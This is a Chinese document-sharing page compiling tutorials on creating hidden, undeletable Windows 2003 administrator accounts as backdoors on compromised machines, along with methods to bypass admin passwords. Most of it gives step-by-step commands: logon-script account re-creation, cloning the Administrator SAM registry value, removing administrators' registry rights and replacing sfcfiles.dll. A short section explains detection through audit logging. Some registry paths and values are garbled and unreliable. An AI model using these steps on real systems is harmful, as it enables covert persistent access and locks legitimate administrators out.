




已阅读5页,还剩1页未读, 继续免费阅读
版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
windows 2003服务器创建隐藏账号以及清除隐藏账号的完美教程 信息管理员教程修改注册表型隐藏账户 由于使用这种方法隐藏的账户是不会在命令提示符和计算机管理中看到的,因此可以到 注册表中删除隐藏账户9小时前一.建立一个别人永远删不掉的管理员用户 操作步骤: 1、在自己电脑里面建立一个.txt文本文件. 2、在里面输入内容 echo off net user yixiao 123456 /add 注释:前面yixiao是用户名后面123456是密码; net localgroup administrators yixiao /add 3、把这个文件保存,更改后缀为yixiao.bat 注释:前面名字随便,后面格式一定要是bat; 4、把这个文件拷贝到对方电脑C:WINNTsystem32GroupPolicyUsersLogon文件目录下,没有的话自己创建 完成,下次对方电脑无论如何都有这个管理员帐号,删除了,下次启动还有! 如果把里面的内容改成 echo off net user administrator 123456 /add 意思是不管你怎么改,下次启动管理员帐号administrator密码一直是123456 二.俺认为上述的方法并不理想,可以用隐藏帐号方法来建帐号会更好 操作步骤: 1、首先建立一个帐号结尾要带$号 ,如果yixiao$ , 密码自己随便,然后把帐号删除. 2、将以下代码保存成(.reg)注册表形式 代码如下: - - Windows Registry Editor Version 5.00 HKEY_LOCAL_MACHONESAMSAMDomainsAccountusers namesyixiao$ =hex(1f4): - - 说明:1f4是Administrator帐号十六进制的值 3、保存好后导入 ,然后用CMD命令设置密码 net user yixiao$ 123456 这样一个隐形帐号就建立好了,用户在本地用户和组内根本无法看到这个帐号所以也不存在删除帐号记得千万别在同事的电脑上捣鼓哦,如果被查出来嘿嘿:-) 隐藏管理员帐号三分钟搞定 对 regedit.exe我想大家都很熟悉,但却不能对注册表的项键设置权限,而regedt32.exe最大的优点就是能够对注册表的项键设置权限 nt/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINESAMSAM键下,但是除了系统用户SYSTEM外,其它用户 都无权查看到里面的信息,因此我首先用regedt32.exe对SAM键为我设置为完全控制权限这样就可以对SAM键内的信息进行读写了了具体 步聚如下: 1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的,首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户 net user hacker$ 1234 /add 2、在开始/运行中输入:regedt32.exe并回车来运行regedt32.exe 3、点权限以后会弹出窗口点添加将我登录时的帐户添加到安全栏内,这里我是以administrator的身份登录的,所以我就将 administrator加入,并设置权限为完全控制这里需要说明一下:最好是添加你登录的帐户或帐户所在的组,切莫修改原有的帐户或组,否则将 会带来一系列不必要的问题等隐藏超级用户建好以,再来这里将你添加的帐户删除即可 4、再点开始运行并输入regedit.exe 回车,启动注册表编辑器regedit.exe 打开键:HKEY_LOCAL_MAICHINESAMSAMDomainsaccountu sernames hacker$ 5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、 1f4.reg,用记事本分别打这几个导出的文件进行编辑,将超级用户对应的项000001F4下的键F的值复制,并覆盖hacker$对应的项 00000409下的键F的值,然后再将00000409.reg与hacker.reg合并 6、在命令行下执行net user hacker$ /del将用户hacker$删除:net user hacker$ /del 7、在regedit.exe的窗口内按F5刷新,然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可 8、到此,隐藏的超级用户hacker$已经建好了,然后关闭regedit.exe在regedt32.exe窗口内把HKEY_LOCAL_MACHINESAMSAM键权限改回原来的样子(只要删除添加的帐户administrator即可) 9、注意:隐藏的超级用户建好后,在帐户管理器看不到hacker$这个用户,在命令行用net user命令也看不到,但是超级用户建立以后,就不能再改密码了,如果用net user命令来改hacker$的密码的话,那么在帐户管理器中将又会看这个隐藏的超级用户了,而且不能删除 建立与删除隐藏的管理员帐号 当黑客入侵一台主机后,会想方设法保护自己的劳动成果,因此会在肉鸡上留下种种后门来长时间得控制肉鸡,其中使用最多的就是账户隐藏技术在肉鸡上 建立一个隐藏的账户,以备需要的时候使用账户隐藏技术可谓是最隐蔽的后门,一般用户很难发现系统中隐藏账户的存在,因此危害性很大,本文就对隐藏账户这 种黑客常用的技术进行揭密 在隐藏系统账户之前,我们有必要先来了解一下如何才能查看系统中已经存在的账户在系统中可以进入命令 提示符,控制面板的计算机管理,注册表中对存在的账户进行查看,而管理员一般只在命令提示符和计算机管理中检查是否有异常,因此如何让 系统账户在这两者中隐藏将是本文的重点 一、命令提示符中的阴谋 其实,制作系统隐藏账户并不是十分高深的技术,利用我们平时经常用到的命令提示符就可以制作一个简单的隐藏账户 点击开始运行,输入CMD运行命令提示符,输入net user piao$ 123456 /add,回车,成功后会显示命令成功完成接着输入net localgroup administrators piao$ /add回车,这样我们就利用命令提示符成功得建立了一个用户名为piao$,密码为123456的简单隐藏账户,并且把该隐藏账户提 升为了管理员权限 我们来看看隐藏账户的建立是否成功在命令提示符中输入查看系统账户的命令net user,回车后会显示当前系统中存在的账户从返回的结果中我们可以看到刚才我们建立的piao$这个账户并不存在接着让我们进入控制面板的 管理工具,打开其中的计算机,查看其中的本地用户和组,在用户一项中,我们建立的隐藏账户piao$暴露无疑 可以总结得出的结论是:这种方法只能将账户在命令提示符中进行隐藏,而对于计算机管理则无能为力因此这种隐藏账户的方法并不是很实用,只对那些粗心的管理员有效,是一种入门级的系统账户隐藏技术 二、在注册表中玩转账户隐藏 从上文中我们可以看到用命令提示符隐藏账户的方法缺点很明显,很容易暴露自己那么有没有可以在命令提示符和计算机管理中同时隐藏账户的技术呢?答案是肯定的,而这一切只需要我们在注册表中进行一番小小的设置,就可以让系统账户在两者中完全蒸发 1、峰回路转,给管理员注册表操作权限 在注册表中对系统账户的键值进行操作,需要到HKEY_LOCAL_MACHINESAMSAM处进行修改,但是当我们来到该处时,会发现无法 展开该处所在的键值这是因为系统默认对系统管理员给予写入DAC和读取控制权限,没有给予修改权限,因此我们没有办法对SAM项下的键值进 行查看和修改不过我们可以借助系统中另一个注册表编辑器给管理员赋予修改权限 点击开始运行,输入 regedt32.exe后回车,随后会弹出另一个注册表编辑器,和我们平时使用的注册表编辑器不同的是它可以修改系统账户操作注册表时的权限(为便于理解,以下简称regedt32.exe)在regedt32.exe中来到HKEY_LOCAL_MACHINESAMSAM处, 点击安全菜单权限,在弹出的SAM的权限编辑窗口中选中administrators账户,在下方的权限设置处勾选完全控制,完成 后点击确定即可然后我们切换回注册表编辑器,可以发现HKEY_LOCAL_MACHINESAMSAM下面的键值都可以展开了 提示:上文中提到的方法只适用于Windows NT/2000系统在Windows XP系统中,对于权限的操作可以直接在注册表中进行,方法为选中需要设置权限的项,点击右键,选择权限即可 2、偷梁换柱,将隐藏账户替换为管理员 成功得到注册表操作权限后,我们就可以正式开始隐藏账户的制作了来到注册表编辑器的HKEY_LOCAL_MACHINESAMSAM DomainsAccountUsersNames处,当前系统中所有存在的账户都会在这里显示,当然包括我们的隐藏账户点击我们的隐藏账户 piao$,在右边显示的键值中的类型一项显示为0x3e9,向上来到HKEY_LOCAL_MACHINESAMSAMDomains AccountUsers处,可以找到000003E9这一项,这两者是相互对应的,隐藏账户piao$的所有信息都在 000003E9这一项中同样的,我们可以找到administrator账户所对应的项为000001F4 将 piao$的键值导出为piao$.reg,同时将000003E9和000001F4项的F键值分别导出为 user.reg,admin.reg用记事本打开admin.reg,将其中F值后面的内容复制下来,替换user.reg中的F值内 容,完成后保存接下来进入命令提示符,输入net user piao$ /del将我们建立的隐藏账户删除最后,将piao$.reg和user.reg导入注册表,至此,隐藏账户制作完成 3、过河拆桥,切断删除隐藏账户的途径 虽然我们的隐藏账户已经在命令提示符和计算机管理中隐藏了,但是有经验的系统管理员仍可能通过注册表编辑器删除我们的隐藏账户,那么如何才能让我们的隐藏账户坚如磐石呢? 打开regedt32.exe,来到HKEY_LOCAL_MACHINESAMSAM处,设置SAM项的权限,将 administrators所拥有的权限全部取消即可当真正的管理员想对HKEY_LOCAL_MACHINESAMSAM下面的项进行 操作的时候将会发生错误,而且无法通过regedt32.exe再次赋予权限这样没有经验的管理员即使发现了系统中的隐藏账户,也是无可奈何的 三.专用工具,使账户隐藏一步到位 虽然按照上面的方法可以很好得隐藏账户,但是操作显得比较麻烦,并不适合新手,而且对注册表进行操作危险性太高,很容易造成系统崩溃因此我们可以借助专门的账户隐藏工具来进行隐藏工作,使隐藏账户不再困难,只需要一个命令就可以搞定 我们需要利用的这款工具名叫HideAdmin,下载下来后解压到c盘然后运行命令提示符,输入HideAdmin piao$ 123456即可,如果显示Create a hiden Administrator piao$ Successed!,则表示我们已经成功建立一个账户名为piao$,密码为123456的隐藏账户利用这款工具建立的账户隐藏效果和上文中修改注 册表的效果是一样的 四、把隐藏账户请出系统 隐藏账户的危害可谓十分巨大因此我们有必要在了解了账户隐藏技术后,再对相应的防范技术作一个了解,把隐藏账户彻底请出系统 1、添加$符号型隐藏账户 对于这类隐藏账户的检测比较简单一般黑客在利用这种方法建立完隐藏账户后,会把隐藏账户提升为管理员权限那么我们只需要在命令提示符中输入 net localgroup administrators就可以让所有的隐藏账户现形如果嫌麻烦,可以直接打开计算机管理进行查看,添加$符号的账户是无法在这里隐藏 的来到HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers Names,把这 里存在的账户和计算机管理中存在的账户进行比较,多出来的账户就是隐藏账户了想要删除它也很简单,直接删除以隐藏账户命名的项即可 3、无法看到名称的隐藏账户 如果黑客制作了一个修改注册表型隐藏账户,在此基础上删除了管理员对注册表的操作权限那么管理员是无法通过注册表删除隐藏账户的,甚至无法知道黑客建 立的隐藏账户名称不过世事没有绝对,我们可以借助组策略的帮助,让黑客无法通过隐藏账户登陆点击开始运行,输入 gpedit.msc运行组策略,依次展开计算机配置Windows 设置安全设置本地策略审核策略,双击右边的审核策略更改,在弹出的设置窗口中勾选成功,然后点确定对审核登陆事件 和审核过程追踪进行相同的设置 进行登陆审核后,可以对任何账户的登陆操作进行记录,包括隐藏账户,这样我们就可以通过计算机管理中的事件查看器准确得知隐藏账户的名称,甚至黑客登陆的时间即使黑客将所有的登陆日志删除,系统还会记录是哪个账户删除了系统日志,这样黑客的隐藏账 户就暴露无疑了 得知隐藏账户的名称后就好办了,但是我们仍然不能删除这个隐藏账户,因为我们没有权限但是我们可以在命令提示符中输入net user 隐藏账户名称 654321更改这个隐藏账户的密码这样这个隐藏账户就会失效,黑客无法再用这个隐藏账户登陆 win2003下创建永远的隐藏帐户操作一、二 前段时间比较流行的一句话肉机其实要想控制远端的计算机,那我想就少不了隐藏用户帐号的问题了,其实创建隐藏用户帐号还是比较简单的,现在我就把创建隐藏用户帐号告诉大家 其实每一个用户帐号在注册表中都有自己帐号数据项 首先我们看看管理员在注册表中的数据项是什么样的 操作一、打开注册表:HKEY_LOCAL_MACHINESAMSAM SAM是保存用户帐号的地方,不过这个项在默认情况下是不可见的我们如果想看内部的内容就必须首先对其授权(建议对注册表不是很熟悉的朋友不要随便改动注册表) 操作二、认识注册表中的帐号分类 在OS中的用户帐号无论是内置帐号,还是后建帐号,在注册表中都能看见不过有两个帐号大家一定要能够认识,那就是管理员帐号和guest帐号 000001fa4表示的是管理员帐号,即使管理员帐号被重命名了这个值也是不会变的,所以我们可以通过这个值来判断,重命名后的管理员帐号 000001fa5 表示的是guest帐号,同样这个值也不会因为,来宾帐号给重命名而改变剩下的其 它值基本上就是后来创建的用户帐号,生成值了 认识了注册表后,现在我们就来利用net user命令创建帐号了,创建隐藏帐号必须在CMD下有关常见的命令,这些命令也可以在OS的帮助中找到 操作三、利用net user命令创建帐号 一、先建立隐藏用户 xbx$ 1、net user xbx$ 123,abc /add 这里的意思是说,建立个xbx$ 帐户密码是123,abc 1、C:Documents and SettingsAdministratornet localgroup administrators xbx$ /add 这里的意思是说把xbx,以便让我们创建用户具备管理员权限 一、观察注册表中的变化,并对注册表做相应的修改 HKEY_LOCAL_MACHINESAMSAM 1、找到我们刚刚创建的用户帐号 我们可以看见000003f6就是我们刚新建立的xbx 2、在注册表中多帐号权限复制 找到HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers 这个项,打开000001f4项,然后再打开F 然后将这里面的值,全选,粘帖并覆盖到000003f6的F值. 3、导出注册表值 现在将注册表中的000001f4、000003f6和xbx都导入出来,可直接将Users所有键值都导出来,到文件. 4、删除帐号 接下来我们再次进入CMD中删除xbx 删除帐号后,则注册表中的值也就没有了,这个时候我们再把刚才导出的注册表项,导入到注册表中 这个时候我们打开本地计算机用户和组就看不见xbx 系统密码破解方法总结 一、ERD2003 利用ERD2003强行修改系统管理员密码的方法简单、易于操作,且对2000/xp/2003系统均有效下面就具体介绍一下这个软件的用法 1.下载ERD2003的iso,刻录成可启动的CD,注意别搞错了,直接刻录镜像最好 2.设置系统从光盘启动,进入系统后,ERD2003会针对系统的网络等硬件设备进行一些设置,总之遇到要你选择时一概选yes即可 3.接下来ERD2003会在你的硬盘里搜索所有已安装的系统,再让你选择要修改的系统 4.耐心等待,进入系统后:按start-administrative tools-locksmith,进入强行修改密码的界面,随后弹出的对话框会让你选择要修改密码的用户名,选择后即可强行修改密码而不用输入原始密码,然后点击NEXT,之后重启 二、PASSWARE KIT 5.0中的Windows KEY 5.0 也有一些工具光盘里有这个程序,直接光盘运行就可以了 如果找不到这种光盘,运行PASSWARE KIT 5.0后生成3个文件:TXTSETUP.OEM、WINKEY.SYS和WINKEY.INF,3个文件共50KB 把这3个文件放在任何软盘中,然后使用XP安装光盘启动电脑,启动过程中按F6键让系统采用第三方驱动程序 此时,正是我们切入的最好时机,放入该软盘就会自动跳到Windows KEY的界面软件会自动检测系统中安装的Windows 2000/XP/2003并列一个表供用户选择,当出现提示Please enter your selection 1.? or 0 to quit:(根据检测到已安装操作系统的数量,?可能是1到9之间的某个数字)时,按相应的数字键进行选择接着出现提示Set local Administrator password to12345?(Y/N):,即问是否把Administrator的密码修改为12345,按Y键,软件首先自动备份原密码,然后把 Administrator的密码修改为12345从光驱中取出光盘,重新启动计算机,如果Windows XP欢迎界面中没有列出Administrator用户,那么就连续按两次Ctrl+Alt+Del组合键,这时就会出现输入用户名和密码的界 面,在用户名中输入Administrator,在密码中输入12345,单击确定按钮就可以登录Windows XP了 提示:第一次登录Windows XP,系统会提示你密码已到期,要不要进行修改你可以根据需要自行选择 这 个方法还可以恢复原来的密码 !如果只是临时使用系统,使用完Windows XP后还想恢复原来的Administrator的密码,可按下面的方法操作 先按照修改Administrator密码的步骤一和步骤二进行操作,接着就会出现提示Would you like to undo Windows XP/2000/NT Key changes?(Y/N):,按Y键,软件就会自动恢复原来的Administrator密码,接着又出现提示Set local Administrator password to 12345?(Y/N):,按N键,不要把Administrator的密码修改为12345从光驱中取出光盘,重新启动计算机,就完成 了密码恢复 三、DreamPackPL 将下载回来的软件DreamPackPL解压缩到硬盘上一个方便的位置,然后运 行其中的DreamPack.exe文件,在软件界面上选中放入Windows安装光盘的光驱,然后点击Make ISO CD image按钮,程序将创建一个ISO格式的光盘镜像,并需要你指定保存该镜像文件的目录创建好后用光盘刻录软件将该镜像文件刻录到光盘中,然后使用 这张光盘引导电脑启动Windows的安装程序将会自动运行,到某时按R键进入故障恢复控制台随后安装程序会自动显示所有已经安装的Windows操 作系统,使用数字键选择你想要进入的操作系统的故障恢复控制台,然后按下回车当需要输入管理员密码的时候也不用担心,我们并不知道密码是什么,但是我们 要只要,直接按下回车就可以跳过这一步随后进入System32文件夹:cd system32,并把该目录下的文件sfcfiles.dll重命名为其他名称:ren sfcfiles.dll sfcfiles.lld接着我们从光盘中I386目录下复制文件pinball.ex_到System32文件夹中,并命名为 sfcfiles.dll:copy d:i386 pinball.ex_ sfcfiles.dll至此前期工作已经全部做完了,把光盘拿出来,然后输入exit命令退出控制台,并重启动电脑以上所作的一切只是为了替换系统 中的sfcfiles.dll文件,因此如果你的操作系统安装在FAT32文件系统的分区上,那就更简单了,只要直接用Windows 98启动盘引导电脑进入DOS,并在DOS下用DreamPackPL软件压缩包中的sfcfiles.dll文件替换System32目录下的原同名文 件即可(注意不要忘了Windows的文件保护,备份文件也要替换) 忘记了电脑中管理员帐户的密码那么可以
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 衡水市中医院宫腔镜子宫纵隔切开术专项技能考核
- 2025年福建省福州市鳌峰坊特色历史文化街区招聘1人考前自测高频考点模拟试题附答案详解
- 2025年潍坊滨海经济技术开发区公开招聘中学教师(12人)模拟试卷完整参考答案详解
- 2025福建莆田市城厢区事业单位定向招考未就业随军家属1人考前自测高频考点模拟试题及参考答案详解一套
- 2025湖南省低空经济发展集团有限公司招聘12人(第二次)模拟试卷及一套答案详解
- 2025年陕西电力科隆发展有限责任公司招聘(1人)考前自测高频考点模拟试题含答案详解
- 张家口市中医院中央空调系统运行调节与故障识别试题
- 上海市中医院糖尿病视网膜病变手术考核
- 2025儿童医院吞咽障碍治疗资格认证
- 张家口市中医院黄疸鉴别诊断流程与决策考核
- 2025中数联物流科技(上海)有限公司招聘考试参考试题及答案解析
- 气管插管脱出应急处理
- 急性胰腺炎护理查房
- 2023年贵州专升本英语真题试卷(完整版)
- JSQ5A夹绳器说明书
- 儿童牙外伤处理方法课件
- 《生态毒理学》课件
- DB14T 2740-2023 春玉米膜侧沟播技术规程
- 福特汽车NVH开发流程
- 中国农业银行笔试题库(含答案)
- 《发现雕塑之美》第2课时《凝神造像-中国传统雕塑》
评论
0/150
提交评论